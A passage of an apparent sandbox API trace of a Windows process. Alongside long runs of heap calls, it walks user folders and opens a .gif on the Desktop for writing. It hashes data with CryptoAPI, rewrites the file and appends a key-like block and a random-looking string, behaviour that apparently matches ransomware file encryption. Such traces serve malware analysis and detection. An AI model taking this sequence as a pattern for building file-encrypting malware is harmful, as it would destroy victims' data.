out: hHeap=0x680000) returned 1 [0095.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0095.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0095.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0095.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0095.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0095.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0095.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0095.813] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0095.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0095.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ddf0 | out: hHeap=0x680000) returned 1 [0095.814] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0095.814] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0095.814] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0095.814] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0095.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.814] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0095.814] PathFindFileNameW (pszPath="") returned="" [0095.814] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0095.814] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0095.814] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0095.814] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0095.814] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\") returned="HuRLDatxCVujdx\\" [0095.814] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0095.814] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0095.814] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0095.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.815] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0095.815] PathFindFileNameW (pszPath="") returned="" [0095.815] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\0w4cso8bfItEFL0gz-o.gif") returned=".gif" [0095.815] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\0w4cso8bfItEFL0gz-o.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hurldatxcvujdx\\0w4cso8bfitefl0gz-o.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.815] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=80329) returned 1 [0095.815] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.818] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x139a3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.818] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.820] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0095.820] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.820] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.821] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.821] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.821] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.821] GetLastError () returned 0x0 [0095.821] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.821] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0095.821] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.821] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.821] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.821] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.821] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.821] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.821] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.821] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x139d0) returned 0x9a06a00 [0095.821] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.821] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.821] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.821] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.821] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f2190 [0095.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9648 [0095.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f21d8 [0095.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9660 [0095.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9690 [0095.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d96a8 [0095.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.822] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.822] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9690 | out: hHeap=0x680000) returned 1 [0095.822] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d96a8 | out: hHeap=0x680000) returned 1 [0095.822] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.822] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.822] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0095.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d96a8 [0095.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0095.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9690 [0095.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0095.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9c28 [0095.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.822] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.822] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d96a8 | out: hHeap=0x680000) returned 1 [0095.822] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.822] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9690 | out: hHeap=0x680000) returned 1 [0095.823] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.823] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.823] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.823] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.823] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.823] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.823] GetCurrentThreadId () returned 0x8c4 [0095.823] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.823] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f6d60 [0095.823] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.823] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0095.823] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.823] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.823] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.823] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.823] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.823] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.823] GetCurrentThreadId () returned 0x8c4 [0095.823] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.823] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.823] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.823] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.823] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.823] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.823] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.823] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.823] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.823] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.823] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0095.823] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.823] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.823] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.823] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.823] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.823] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.824] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.824] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.824] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.824] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.824] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.824] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.824] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9690 [0095.824] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.824] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0095.824] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.824] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.824] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.824] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.824] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.824] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d96a8 [0095.824] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.824] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.824] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.824] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9678 [0095.824] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.824] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.824] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.824] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.824] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.824] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.824] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.824] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d96c0 [0095.824] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.824] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d89a0 [0095.824] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.824] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0095.824] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.824] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0095.824] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.824] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0095.825] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9690 | out: hHeap=0x680000) returned 1 [0095.825] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9690 [0095.825] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.825] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0095.825] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.825] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0095.825] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.825] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0095.825] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0095.825] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0095.825] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.825] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0095.825] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9690 | out: hHeap=0x680000) returned 1 [0095.825] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0095.825] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0095.825] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.825] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.825] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0095.825] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0095.825] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0095.825] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0095.825] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0095.825] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0095.825] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.825] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.825] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.825] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d96c0 | out: hHeap=0x680000) returned 1 [0095.825] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.825] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.825] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.826] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d96a8 | out: hHeap=0x680000) returned 1 [0095.826] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9678 | out: hHeap=0x680000) returned 1 [0095.826] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0095.826] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0095.826] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0095.826] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9660 | out: hHeap=0x680000) returned 1 [0095.826] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f21d8 | out: hHeap=0x680000) returned 1 [0095.826] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.826] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0095.826] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0095.826] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0095.826] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0095.826] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.826] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.826] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9c28 | out: hHeap=0x680000) returned 1 [0095.826] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0095.826] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.826] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0095.826] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x139c4, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x139c4, lpOverlapped=0x0) returned 1 [0095.826] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0095.826] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x139c9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.827] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0095.827] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.827] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd88 [0095.827] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0095.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0095.827] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0095.827] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.827] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd88 | out: hHeap=0x680000) returned 1 [0095.827] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, 